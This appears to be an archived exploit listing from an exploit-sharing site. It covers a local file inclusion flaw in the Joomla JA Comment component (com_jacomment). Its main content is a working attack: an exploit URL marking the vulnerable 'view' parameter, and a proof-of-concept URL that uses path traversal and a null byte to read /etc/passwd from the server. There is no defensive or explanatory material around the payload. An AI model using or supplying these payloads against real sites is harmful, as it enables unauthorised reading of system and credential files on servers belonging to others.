id: 11798
date: 04/14/2010
title: Joomla Component com_jacomment Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

=================================================================
Joomla Component com_jacomment Local File Inclusion Vulnerability
=================================================================

=========================================================================================================
 
 
  [o] Joomla Component JA Comment Local File Inclusion Vulnerability
  
       Software : com_jacomment
       Vendor   : http://www.joomlart.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=========================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_jacomment&view=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
 
 
=========================================================================================================



#  0day.today [2023-03-26]  #